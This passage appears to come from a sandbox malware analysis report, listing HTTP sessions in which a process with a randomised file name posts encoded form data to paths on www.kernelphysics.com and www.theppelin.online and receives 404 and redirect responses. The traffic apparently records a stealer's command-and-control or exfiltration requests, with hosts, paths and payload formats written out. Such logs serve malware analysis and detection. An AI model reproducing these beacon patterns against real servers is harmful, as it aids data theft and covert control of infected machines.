                                  May 27, 2024 12:36:46.976640940 CEST829INData Raw: 80 cf b9 d2 80 80 e8 c6 e9 36 48 58 f6 74 5b 0c 69 8a b8 dd e3 94 fc 46 f5 12 23 21 dc cb 6c 7a 40 5e cc 64 2e 92 40 bf 56 cc c0 1c f4 47 e6 c5 4e e3 e4 51 4e 51 6b 99 46 24 e0 ad 2a 40 b1 64 2d 88 bc 94 e8 b2 b2 94 70 1c b8 88 a3 96 3e 46 84 5a
                                  Data Ascii: 6HXt[iF#!lz@^d.@VGNQNQkF$*@d-p>FZx@%.Ep8j11ydZDE&tkR5yL?PfhE|3pFt 6+`p fV#\4v;Z}!'na85D~efSk.&


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  43192.168.2.74975445.64.187.212806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:48.405726910 CEST1796OUTPOST /w912/ HTTP/1.1
                                  Host: www.kernelphysics.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.kernelphysics.com
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.kernelphysics.com/w912/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 69 62 69 7a 33 78 51 4d 58 7a 4a 66 30 72 49 7a 74 4f 69 2f 42 56 41 33 6b 42 7a 46 6c 49 59 47 54 6e 6d 75 46 77 57 56 56 74 42 78 7a 41 7a 52 4b 6b 77 59 75 52 49 6a 70 6e 4f 78 59 6a 70 32 36 2f 58 41 47 6c 4f 6e 59 53 38 35 51 49 2b 32 32 43 61 63 48 4f 68 46 77 71 2f 55 74 75 30 35 71 6a 4f 6b 59 68 51 74 79 4e 6a 2f 66 77 46 72 6a 6b 49 6c 36 42 4a 36 6e 63 46 34 6f 53 59 77 63 59 70 4d 71 50 6b 63 66 45 50 35 36 52 59 6a 70 31 51 62 37 58 50 2f 53 5a 61 59 6e 50 63 43 68 76 30 56 33 49 79 6c 50 67 30 4a 68 39 6a 70 77 34 77 44 64 56 4a 75 79 61 46 68 36 33 77 63 4c 51 59 43 63 6c 61 37 57 2b 55 4c 43 54 4f 73 69 58 75 79 6c 4f 6c 70 4e 33 4b 63 36 56 41 36 57 6c 53 48 4f 68 43 79 6b 73 54 54 31 77 66 32 59 30 6b 6a 38 71 63 58 66 33 39 6b 4b 56 77 4e 68 6b 63 52 42 45 4c 72 34 63 44 77 43 5a 5a 48 35 41 57 44 5a 68 34 59 57 65 6d 46 6d 6d 6e 64 58 4a 55 4d 6b 4c 50 30 56 79 32 6f 6f 6f 61 50 51 2f 50 6a 6e 6c 43 62 4c 62 4b 38 4f 5a 31 50 50 4f 50 6f 4b 69 36 32 6e 30 51 74 51 31 39 [TRUNCATED]
                                  Data Ascii: 4h=ibiz3xQMXzJf0rIztOi/BVA3kBzFlIYGTnmuFwWVVtBxzAzRKkwYuRIjpnOxYjp26/XAGlOnYS85QI+22CacHOhFwq/Utu05qjOkYhQtyNj/fwFrjkIl6BJ6ncF4oSYwcYpMqPkcfEP56RYjp1Qb7XP/SZaYnPcChv0V3IylPg0Jh9jpw4wDdVJuyaFh63wcLQYCcla7W+ULCTOsiXuylOlpN3Kc6VA6WlSHOhCyksTT1wf2Y0kj8qcXf39kKVwNhkcRBELr4cDwCZZH5AWDZh4YWemFmmndXJUMkLP0Vy2oooaPQ/PjnlCbLbK8OZ1PPOPoKi62n0QtQ199W69GzfxW0qRp7bKOdIGiqjRb6bQlZJ/CfllFeHvNrUJbooxVGpK3TmWyQ/kAD2CfK8WRcOGtaJDsOKSM/FT1m0/l7IXbeGCYjQ8nqmjm9lzkF0RD9SRElP5Wi+LDb2hqc5UVKdOmJ8xoklsu1za4/Z6UJl3mzgbJEwHkp6eBMj1OmD0zCPhvWfvhhb6a4y63vHJfY09FoqdqnofqtGONAtDEAFpGgO/OJ3LAVodfv41X5dAH72zN/rhlAH2NG4Fp4n5+MDposnlRrZpSHssxHH3rKbEo5LKv1+zJx1FaxNCnHYINUnAkSSMvSRgxa0kbn2UCxBPQKuSuu6bE10gwnFFIJTvmYVHmJKI8GRGo8h+NJ7c9tJFlnN8dniU7zqtlPrc6zUkS9EnpKiETylFeiYyJBQZJEdZs5q04p+mcZutYoW4dXfUdi4bCUby9JHgmV5aabGQyF/0MnS0khUaFR5poGeLGfwY3GjpA1bbk3+cWYGZtYdbOpGli71SAbz6gmsZ8+UqvGAH6on9ypuHK3oiIc6/bwT6fKQhNbRn2UMOLE/6VkKdKSqns1AttdEsbcPbu3rBaoiarpvqSX+zwLTv9ogCJ7OBfu5EGazDjHqNvhBLt2mnR+A2bObVIWcVEXtvFm/idobgfzwk3W+mTFyuKl/HF3s1Rl [TRUNCATED]
                                  May 27, 2024 12:36:49.502720118 CEST1236INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:36:49 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <https://kernelphysics.com/wp-json/>; rel="https://api.w.org/"
                                  Server: Nginx_Rc-Cr
                                  Content-Encoding: br
                                  Data Raw: 32 32 31 64 0d 0a 15 74 9b 8c 44 58 93 7a 00 34 42 87 cf 79 ff ef 4f fd fe bf ed 9f af 1d 65 c5 86 1c 49 48 14 17 1c 98 92 c9 b9 37 33 3d e5 b5 38 2b 4b 80 b0 49 30 62 21 11 3b 97 e1 95 d2 cf 9d d7 eb b4 eb f3 f7 e7 bf 7c 53 75 09 28 86 ce e3 ca ae 3c 2e ca 90 62 95 73 49 be b0 ab f9 7b ff 6e e6 0e 07 78 70 80 c2 01 20 3d a0 22 c0 30 cc 6f c3 df 7f 09 14 00 52 12 08 2a 80 54 0c b1 73 d5 84 dc b9 2c cf 19 56 c5 d6 ae b4 0c 73 d9 d3 f9 6d ea dd 95 27 84 10 42 08 2d 6c 6e c3 d9 31 b1 fe 3b 85 84 01 0d 12 99 3c 86 fb fe fa 57 18 db 70 41 89 c8 de 85 28 01 26 2e d9 7b bc 2b 72 b8 bc 80 39 dc c7 40 45 20 da 9a 11 92 15 b9 bd 06 34 56 c8 39 60 93 10 98 37 05 2a 45 1e 35 8a e1 7c 33 0b e6 07 35 fb 50 cd 46 ac 95 91 88 42 25 18 b9 bc b0 ef 59 a7 c3 38 89 10 f0 0e ba 15 87 95 c0 9c 9d b3 92 42 4b 36 10 21 26 b7 cb 84 09 e8 b3 28 8f ac 36 f5 8a 37 af c6 2e af 1c ce 63 0e 16 d5 8a fc ae cb 2a 4f b2 a9 64 29 43 90 a5 26 ed 36 65 53 a7 a7 ce 20 9c e1 e1 e0 6c 55 98 e6 f8 b4 00 c8 71 d9 ee fe 67 68 56 a1 ea cc 03 [TRUNCATED]
                                  Data Ascii: 221dtDXz4ByOeIH73=8+KI0b!;|Su(<.bsI{nxp ="0oR*Ts,Vsm'B-ln1;<WpA(&.{+r9@E 4V9`7*E5|35PFB%Y8BK6!&(67.c*Od)C&6eS lUqghV8j9$L<~cLHwXY'C\2r Wiz|~x#vKiMZ5E/%M"6b<$,8%h(J>*J4z\@eR*P3kTCMSRfl^_@nB-qQBX;6zjZncq-):$oRXWKghjT#+KKX:3uwSw H?`uT?.>oTm:*&*/n:t5#KQ;b4")UzY6zG}:GuBl):#)1T[MaZfauMf7RJ@ftKoge-.TumT#Vji.X7Z/m-iw}BO]3fXTTBxg`cI,oX30}2^
                                  May 27, 2024 12:36:49.502737999 CEST164INData Raw: 4b d2 95 34 4d ef b9 fe 40 18 01 de d0 73 3a 2f 2f 1b 37 91 85 d7 9e d5 a2 c0 18 69 0d a3 62 a8 2a 21 a4 ff 91 12 1b 8d e7 d7 01 19 45 51 73 67 ee 7b 9b c8 fb b4 a4 02 ac 6b 19 bb 4b 85 96 48 39 a9 a2 30 32 80 7a a5 68 d9 66 33 2f 5d b6 59 9e 7b
                                  Data Ascii: K4M@s://7ib*!EQsg{kKH902zhf3/]Y{6,_.cu'bU9Y.g7Gyln:A2NinJ>2};b
                                  May 27, 2024 12:36:49.502923012 CEST1236INData Raw: 9a 23 7b 51 0c 2c 1e e8 2a 73 0b 78 cf 95 39 47 b1 98 94 86 0e f1 9e ae ce 4f 50 e4 0f 2c a9 da 3d 06 0d 9c 6b f6 c9 a1 52 d5 9a 08 9d 77 0a da 7e 3d 43 47 91 dc de 50 e5 f0 d3 aa 79 92 8d 36 3c f1 3a 55 b5 1c 8d 94 d7 14 1e 65 e5 d6 ab 34 58 f2
                                  Data Ascii: #{Q,*sx9GOP,=kRw~=CGPy6<:Ue4XN},Ps_%0;,TET;c!7C"{2Kxz4eQ52TM1z5(umvNGXNDlCn0T7i$e1\Pwh
                                  May 27, 2024 12:36:49.502953053 CEST224INData Raw: ba 90 95 79 9e 8f 18 05 04 d8 6d 40 34 b1 5e 92 c5 bd 20 93 2b dc ac 12 61 4d 30 f7 a7 d8 75 a7 98 db c0 4e 3c de d2 e2 41 80 67 bc e2 db b3 35 6d db 89 9d bc 93 ca e2 6a 91 32 10 87 fb b5 b8 eb 62 d7 65 98 cf d8 cb ad c7 b0 cb 66 98 7b ec c5 c7
                                  Data Ascii: ym@4^ +aM0uN<Ag5mj2bef{E,<zY<t(YApdl't(= \odN<@ ]8ejv/|wuP8&6y"~<m=
                                  May 27, 2024 12:36:49.503071070 CEST1236INData Raw: 0c 4f 49 78 5c 52 b6 7a 7d c9 58 6d b0 b8 ae d8 65 13 ec 7a 93 1c f4 b8 bd c1 a9 e0 b3 14 b1 ad 3b 23 a2 dd a5 d6 eb bf 39 c0 7c 12 80 fb 26 7e 80 fd c0 86 00 81 eb 0e 9b 62 86 27 2e 9f 9e db ac d5 4f d9 fc 3a 0f 73 ee 96 e7 73 c1 30 87 cf dd d4
                                  Data Ascii: OIx\Rz}Xmez;#9|&~b'.O:ss0'jl<,H/-KfTb|2t)S=`Shp)TWU)2f<k`sw|uWB[?, `WY8or+wM%e!0>_v
                                  May 27, 2024 12:36:49.503166914 CEST1236INData Raw: 24 44 11 f3 42 e4 51 8f 63 59 ea 6e 4c 4d 0f 49 56 92 b6 8e 54 7d b6 4f 39 07 74 7e 0b 95 5b a5 19 3b 24 ea 42 ad 74 8a 8e ce ec e0 b6 26 36 1e 5a 38 da ca b7 00 ba c8 0a 73 7b 75 a9 bb fb de d9 19 bc ba fe 00 95 50 2b bf c8 77 1a 9d 21 95 6b 16
                                  Data Ascii: $DBQcYnLMIVT}O9t~[;$Bt&6Z8s{uP+w!k5jsZByBLU<h0MAtBL&+?Mf0L#tAbkk3GWc$v~>f#IQ'M9RFo#Zh:^G'9:0$v-XC2FE+C'Rm
                                  May 27, 2024 12:36:49.503179073 CEST1236INData Raw: a1 52 90 a3 40 1f 75 a6 35 3a c0 6c 89 1e 96 f2 89 5b 0e f3 2a 82 85 68 50 63 ee 12 6a 53 c7 55 1b ed b5 68 aa 65 59 47 43 cc be 26 97 5b 14 b7 5f 05 53 38 d3 6e 2f 6b 80 98 62 51 b9 97 e8 24 82 ff 57 ea a2 e2 79 d7 b0 3a 73 52 67 3d bf a8 38 f3
                                  Data Ascii: R@u5:l[*hPcjSUheYGC&[_S8n/kbQ$Wy:sRg=8U.J&KVEl'2C({utpT,v+).R@"G(8n0;fty9m-TU#;F[*O;M']1Bxx{,U)D=ZAa1}u$
                                  May 27, 2024 12:36:49.503190994 CEST1236INData Raw: fa 78 12 fb 81 3a 2c 07 55 41 32 db c5 67 05 94 22 89 0f b8 f7 3b c5 63 0b ca 9c 87 ac c8 5a d9 4c 2e 67 17 3e db 55 23 36 cf 34 f7 30 84 08 cd 85 80 e2 bc 6a 08 51 af 36 96 f5 9b 6d 61 6a 43 1e e5 90 c2 0a 2c ef a8 4a c5 99 07 8e ed bd f1 22 44
                                  Data Ascii: x:,UA2g";cZL.g>U#640jQ6majC,J"Dyw>CQD=\*V?ejq{k<:7dHCC78tUU`}#+u:v6&0Lmm--/$nFu+S(.A-ZAdr
                                  May 27, 2024 12:36:49.503201962 CEST1236INData Raw: 2a d5 f2 60 5c cc e5 0f ce af 2f be 11 af 14 46 b1 76 a3 c0 87 ff 64 f4 09 2f 4e 1a be 6d a4 25 47 34 a1 fa b6 b7 9a 0a ef 46 41 d0 ae 0f 63 10 86 11 ab 33 3f 51 14 b9 ad 13 cc 3a cb 7c 8e 35 ad 7a ea b9 94 3c 77 34 df 77 0a 43 9a 5f 55 58 9a af
                                  Data Ascii: *`\/Fvd/Nm%G4FAc3?Q:|5z<w4wC_UX1gub7U_sL.L[].c8tjN4`EDMZRo`fYTec20(NP]Yr0?)vV-_V'E!7!fAJIID"[Z!gU
                                  May 27, 2024 12:36:49.503212929 CEST85INData Raw: 1e 64 56 98 07 cc d7 a0 eb bc a1 e0 b3 0a 04 79 34 7f 1f 0c d1 27 aa 05 4c 0f f7 18 85 ae 86 ab 59 49 a9 a7 42 3e 84 c0 66 1e c8 dc 2a aa 42 21 e2 81 50 d5 e1 fe 3e 3e 83 bb e4 f2 cc e2 4f b8 e1 31 3b 1c 7f e0 05 67 5d ad ee 28 dc 00 0d 0a 30 0d
                                  Data Ascii: dVy4'LYIB>f*B!P>>O1;g](0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  44192.168.2.74975545.64.187.212806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:50.953716040 CEST492OUTGET /w912/?4h=vZKT0BokUz0Nxao4mcSjanYirAH1q7MhbEC9IA+OY5sgrADNPU0JrQkM0waXTw1UtcTvO26zHEpWIbySxhuqYeEN75iL48Y+nSKxcRhJvbqJM0ozumkczTZ0r6h/7BELTqwTup5gX3mE&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.kernelphysics.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:36:52.011612892 CEST540INHTTP/1.1 301 Moved Permanently
                                  Date: Mon, 27 May 2024 10:36:51 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 0
                                  Connection: close
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  X-Redirect-By: WordPress
                                  Location: http://kernelphysics.com/w912/?4h=vZKT0BokUz0Nxao4mcSjanYirAH1q7MhbEC9IA+OY5sgrADNPU0JrQkM0waXTw1UtcTvO26zHEpWIbySxhuqYeEN75iL48Y+nSKxcRhJvbqJM0ozumkczTZ0r6h/7BELTqwTup5gX3mE&623=YLI8v8eXd0Y
                                  Server: Nginx_Rc-Cr
                                  etag: on
                                  X-Cache-Status: BYPASS - 15m desktop


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  45192.168.2.749756194.58.112.174806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:57.157707930 CEST760OUTPOST /zxqv/ HTTP/1.1
                                  Host: www.theppelin.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.theppelin.online
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.theppelin.online/zxqv/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 44 73 50 39 48 41 66 68 73 4f 78 58 37 4f 6c 6d 6f 72 54 5a 30 4e 70 56 4d 4f 33 6a 6d 75 4d 42 68 48 38 6a 4d 5a 37 4c 41 61 79 2f 64 65 54 36 58 38 73 5a 6e 6c 67 38 6d 69 65 72 77 45 52 76 59 6b 63 56 31 57 4c 54 74 71 65 6d 77 64 59 66 4b 4e 38 35 51 42 62 31 63 73 51 76 34 67 72 61 67 30 57 77 58 46 6a 51 74 71 4c 6f 47 6b 4d 55 72 6f 44 69 58 72 52 50 69 4d 38 55 65 2f 58 33 2f 73 30 65 53 35 78 56 4d 4e 32 2b 2f 2f 6b 57 34 41 4f 4e 48 56 2b 53 49 2b 61 6b 2b 2f 57 6d 64 54 50 44 59 30 4f 46 6f 6c 4f 6a 59 57 65 4e 72 70 4a 6f 32 55 49 52 34 59 71 6f 4c 4b 30 39 4e 74 61 62 2f 56 44 38 67 73 73 72 67 30 33 41 4f 51 3d 3d
                                  Data Ascii: 4h=DsP9HAfhsOxX7OlmorTZ0NpVMO3jmuMBhH8jMZ7LAay/deT6X8sZnlg8mierwERvYkcV1WLTtqemwdYfKN85QBb1csQv4grag0WwXFjQtqLoGkMUroDiXrRPiM8Ue/X3/s0eS5xVMN2+//kW4AONHV+SI+ak+/WmdTPDY0OFolOjYWeNrpJo2UIR4YqoLK09Ntab/VD8gssrg03AOQ==
                                  May 27, 2024 12:36:57.872515917 CEST1236INHTTP/1.1 404 Not Found
                                  Server: nginx
                                  Date: Mon, 27 May 2024 10:36:57 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Content-Encoding: gzip
                                  Data Raw: 65 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 8c 7a 6a 38 54 ae e3 99 be 87 bf aa 6e e9 ba 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 9a 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 c2 b2 70 86 1c 45 be 69 87 21 a6 98 f4 77 b0 8c ac f5 86 84 5c be 67 e2 cf ea 72 49 90 fe a0 ae 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf [TRUNCATED]
                                  Data Ascii: e31Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkzj8Tn:EF){Ja8Q[@mpEi!w\grI*apc-7v\eG4#*WX._nV:H:Q?Lll02 CveQ*dVElg FC6(LA2Zm36ZdVV.cN>t{@c87nrDbl.jx~D"E&GNXw^|]^po~6V{Q4Zjgu-P%?ZT<KNjo4[Yf}f1]jnld-o/,=?@"FaYtm'PZf}oGiUVvw'd>kN|hQ^.@WBJFpVVMPK+B=ec:Ka!Z.!gyD}VwBk)XpKr0\AV[52K(DQ\/9NQ~??NND,OmYhI6Wz3d/QUI5B(0`7G^IrS3^8Zpp(978.S(B&`a2>*8Isb2NaQ)_ [TRUNCATED]
                                  May 27, 2024 12:36:57.872529984 CEST224INData Raw: a7 ed d3 59 27 e6 2f 10 ac 6b 0c e0 cf 8e d7 72 d5 46 64 68 df c6 84 51 e0 7b dd a7 1b 05 6c 0c b8 db 14 cc fe 05 f4 22 72 41 bd 8f e3 7b c0 19 8f 30 c5 b3 b3 ce ab 95 13 8e da da e4 b9 24 6d 1f 8c 37 40 ac f4 14 c6 fd 33 22 e0 fd e4 4b b8 c8 e3
                                  Data Ascii: Y'/krFdhQ{l"rA{0$m7@3"K;s*n@S<s)n6FIduzICCw4:In-^`.#AcPH>|XyX!e3|Vh-0=~$Su(A<c
                                  May 27, 2024 12:36:57.872555017 CEST1236INData Raw: e4 43 ac 68 27 7e 00 d9 76 b1 10 2c 22 b9 2d 28 c1 49 0b 90 f2 b0 63 a6 15 14 3d 69 c1 3b f8 ff 80 d6 98 85 55 68 20 f9 84 b5 c0 be 0c 2d c5 df 41 2d 68 fb c3 af f7 df 98 9b ac c1 60 3c 68 b5 7f 4a 3e 4f cd 7a 8f ad 99 2e 93 49 68 27 7e 84 9c 0e
                                  Data Ascii: Ch'~v,"-(Ic=i;Uh -A-h`<hJ>Oz.Ih'~ocq0[3mKCaQ-k3x*Ev.^gI!BJ0N3&g3"t o7+*iiD2w[:Vs1(IE]Cjj?OiL=m]exHQo
                                  May 27, 2024 12:36:57.872611046 CEST1123INData Raw: 95 04 2e 11 aa 62 ba 11 b5 0f 14 ce e2 bc 95 a9 ce d7 8f 4c 7d 9d 8c 85 2b 8d 96 d3 99 3b ce a6 0c 04 dd 03 84 b8 62 c5 45 f7 68 80 0b 27 f3 77 23 15 8c d7 94 0b ea f7 83 73 ae 5b 11 65 59 16 d5 e9 d9 48 8a 0d 3f 80 bc 34 86 83 fe 27 56 f0 af ae
                                  Data Ascii: .bL}+;bEh'w#s[eYH?4'V3]uJ'?fyutlEIw^WWUs3B~uPQ.UXsG_]412p:8/,:Kv\nP.9.tg'|u|Iv#J'.O$


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  46192.168.2.749757194.58.112.174806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:59.718074083 CEST780OUTPOST /zxqv/ HTTP/1.1
                                  Host: www.theppelin.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.theppelin.online
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.theppelin.online/zxqv/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 44 73 50 39 48 41 66 68 73 4f 78 58 35 75 31 6d 76 4d 6e 5a 6b 64 70 57 41 75 33 6a 76 4f 4d 37 68 48 34 6a 4d 59 2f 6c 42 6f 57 2f 45 36 58 36 57 35 41 5a 67 6c 67 38 68 53 65 75 74 30 52 30 59 6b 51 64 31 58 6e 54 74 71 4b 6d 77 59 6b 66 4b 65 55 2b 57 52 62 7a 48 38 51 74 33 41 72 61 67 30 57 77 58 46 32 59 74 72 76 6f 47 51 49 55 6b 71 37 68 55 72 52 4d 30 38 38 55 50 50 58 4a 2f 73 30 47 53 38 6f 2b 4d 49 71 2b 2f 39 38 57 2f 52 4f 4f 4f 56 2f 5a 56 4f 62 74 37 65 48 65 61 43 2f 51 58 6d 54 63 71 6b 61 79 55 41 44 76 78 4c 46 45 6f 46 77 71 38 61 4f 65 63 73 70 49 50 73 65 44 79 33 33 64 2f 62 4a 42 74 6d 57 45 59 70 6e 65 51 58 61 63 67 79 66 6a 52 70 4c 48 38 69 47 6a 36 78 4d 3d
                                  Data Ascii: 4h=DsP9HAfhsOxX5u1mvMnZkdpWAu3jvOM7hH4jMY/lBoW/E6X6W5AZglg8hSeut0R0YkQd1XnTtqKmwYkfKeU+WRbzH8Qt3Arag0WwXF2YtrvoGQIUkq7hUrRM088UPPXJ/s0GS8o+MIq+/98W/ROOOV/ZVObt7eHeaC/QXmTcqkayUADvxLFEoFwq8aOecspIPseDy33d/bJBtmWEYpneQXacgyfjRpLH8iGj6xM=
                                  May 27, 2024 12:37:00.435714960 CEST1236INHTTP/1.1 404 Not Found
                                  Server: nginx
                                  Date: Mon, 27 May 2024 10:37:00 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Content-Encoding: gzip
                                  Data Raw: 65 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 8c 7a 6a 38 54 ae e3 99 be 87 bf aa 6e e9 ba 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 9a 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 c2 b2 70 86 1c 45 be 69 87 21 a6 98 f4 77 b0 8c ac f5 86 84 5c be 67 e2 cf ea 72 49 90 fe a0 ae 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf [TRUNCATED]
                                  Data Ascii: e31Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkzj8Tn:EF){Ja8Q[@mpEi!w\grI*apc-7v\eG4#*WX._nV:H:Q?Lll02 CveQ*dVElg FC6(LA2Zm36ZdVV.cN>t{@c87nrDbl.jx~D"E&GNXw^|]^po~6V{Q4Zjgu-P%?ZT<KNjo4[Yf}f1]jnld-o/,=?@"FaYtm'PZf}oGiUVvw'd>kN|hQ^.@WBJFpVVMPK+B=ec:Ka!Z.!gyD}VwBk)XpKr0\AV[52K(DQ\/9NQ~??NND,OmYhI6Wz3d/QUI5B(0`7G^IrS3^8Zpp(978.S(B&`a2>*8Isb2NaQ)_ [TRUNCATED]
                                  May 27, 2024 12:37:00.435728073 CEST224INData Raw: a7 ed d3 59 27 e6 2f 10 ac 6b 0c e0 cf 8e d7 72 d5 46 64 68 df c6 84 51 e0 7b dd a7 1b 05 6c 0c b8 db 14 cc fe 05 f4 22 72 41 bd 8f e3 7b c0 19 8f 30 c5 b3 b3 ce ab 95 13 8e da da e4 b9 24 6d 1f 8c 37 40 ac f4 14 c6 fd 33 22 e0 fd e4 4b b8 c8 e3
                                  Data Ascii: Y'/krFdhQ{l"rA{0$m7@3"K;s*n@S<s)n6FIduzICCw4:In-^`.#AcPH>|XyX!e3|Vh-0=~$Su(A<c
                                  May 27, 2024 12:37:00.435797930 CEST1236INData Raw: e4 43 ac 68 27 7e 00 d9 76 b1 10 2c 22 b9 2d 28 c1 49 0b 90 f2 b0 63 a6 15 14 3d 69 c1 3b f8 ff 80 d6 98 85 55 68 20 f9 84 b5 c0 be 0c 2d c5 df 41 2d 68 fb c3 af f7 df 98 9b ac c1 60 3c 68 b5 7f 4a 3e 4f cd 7a 8f ad 99 2e 93 49 68 27 7e 84 9c 0e
                                  Data Ascii: Ch'~v,"-(Ic=i;Uh -A-h`<hJ>Oz.Ih'~ocq0[3mKCaQ-k3x*Ev.^gI!BJ0N3&g3"t o7+*iiD2w[:Vs1(IE]Cjj?OiL=m]exHQo
